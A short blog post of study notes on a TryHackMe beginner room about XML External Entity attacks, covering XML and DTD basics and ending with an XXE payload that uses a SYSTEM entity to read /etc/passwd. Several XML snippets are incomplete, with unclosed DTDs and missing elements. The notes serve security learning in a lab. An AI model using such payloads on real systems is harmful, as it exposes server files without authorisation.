TryHackMe: Complete Beginner (Supplements)

author: Nathan Acks
date: 2021-12-09


Deploy the VM

I think I’ve basically done a different version of this room…

Anyways, two types of XML External Entity (XXE) attacks:

eXtensible Markup Language

Some things to remember about XML documents:


The Document Type Definition defines/validates an XML document. For example, the DTD defined as

<!DOCTYPE note [
	<!ELEMENT note (to,from,heading,body)>
	<!ELEMENT from (#PCDATA)>
	<!ELEMENT heading (#PCDATA)>
	<!ELEMENT body (#PCDATA)>

validate the XML document

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE note SYSTEM "note.dtd">  
	<body>XXE attack</body>  

The root node is defined immediately after the DOCTYPE declaration, with each ELEMENT declaration taking the form element_name (contained_data). #PCDATA stands for “printable character data.

The DTD can also define multiple ENTITY types - &amp; and similar.

<!DOCTYPE userInfo [
	<!ENTITY name "feast">

Conveniently, DTD can be defined in line, and not just by included files.

These last two features are what we will leverage to attack applications that accept XML inputs.

XXE Payload

<?xml version="1.0"?>
<!DOCTYPE root [
	<!ENTITY read SYSTEM 'file:///etc/passwd'>

The SYSTEM directive allows us to include other files… Possibly quite sensitive ones, depending on the permissions of our webserver and how good the application’s input sanitization is.